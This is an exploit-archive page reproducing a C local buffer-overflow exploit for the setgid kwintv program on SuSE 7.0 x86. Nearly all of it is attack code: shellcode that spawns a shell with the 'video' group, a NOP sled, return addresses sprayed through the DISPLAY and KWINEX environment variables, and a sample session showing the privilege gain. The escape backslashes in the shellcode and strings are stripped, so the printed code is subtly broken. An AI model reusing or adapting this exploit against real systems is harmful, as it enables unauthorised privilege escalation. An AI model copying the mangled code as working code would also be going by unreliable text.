Kwintv Local Buffer Overflow Exploit (gid=video(33))

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kwintv Local Buffer Overflow Exploit (gid=video(33))
# Published : 2000-12-06
# Author : Cody Tubbs
# Previous Title : Pine (Local Message Grabber) Exploit
# Next Title : expect (/usr/bin/expect) buffer overflow

/*
 * (kwintv) local buffer overflow. (gid=video(33))
 *
 * Author: Cody Tubbs (loophole of hhp).
 * www.hhp-programming.net / pigspigs@yahoo.com
 * 12/17/2000
 *
 * For SuSE 7.0 - x86.
 * sgid "video"(33) by default.
 *
 * bash-2.04$ id
 * uid=1000(loophole) gid=501(noc)
 * bash-2.04$ ./b 0
 * Ret-addr 0xbfffe1fc, offset: 0, allign: 0.
 * sh-2.04$ id
 * uid=1000(loophole) gid=33(video)
 * sh-2.04$
 *
 */

#include <stdio.h>

#define OFFSET 0
#define ALLIGN 0
#define NOP    0x90
#define DBUF   481 //481+((RET)).
#define GID    33

static char shellcode[]=
  "x31xdbx31xc9xbbxffxffxffxffxb1x00x31xc0"
  "xb0x47xcdx80x31xdbx31xc9xb3x00xb1x00x31"
  "xc0xb0x47xcdx80xebx1fx5ex89x76x08x31xc0"
  "x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08"
  "x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8"
  "xdcxffxffxffx2fx62x69x6ex2fx73x68x69";

long get_sp(void){
  __asm__("movl %esp,%eax");
}

void workit(char *heh){
  fprintf(stderr, "n(kwintv) local exploit for SuSE 7.0 - x86n");
  fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)nn");
  fprintf(stderr, "Usage: %s <offset> [allign(0..3)]n", heh);
  fprintf(stderr, "Examp: %s 0n", heh);
  fprintf(stderr, "Examp: %s 0 1n", heh);
  exit(1);
}


main(int argc, char **argv){
  char eipeip[DBUF], buffer[4096], heh[DBUF+1];
  int i, offset, gid, allign;
  long address;

  if(argc<2){
    workit(argv[0]);
  }
 
  if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
  if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

  address=get_sp()-offset;

  if(allign>0){for(i=0;i<allign;i++){eipeip[i]=0x69;}}//0x69.HEH.:D
  for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}

  gid=GID;
  shellcode[10]=gid;
  shellcode[22]=gid;
  shellcode[24]=gid;
 
  for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
    buffer[i]=NOP;
  }
 
  memcpy(heh, eipeip, strlen(eipeip));
  memcpy(heh, "DISPLAY=", 8);
  putenv(heh);

  memcpy(buffer+i, shellcode, strlen(shellcode));
  memcpy(buffer, "KWINEX=", 7);
  putenv(buffer);
 
  fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.n",address,offset,allign);
  execlp("/opt/kde/bin/kwintv", "kwintv", 0);//Change path if needed. :D
}


// www.Syue.com [2000-12-06]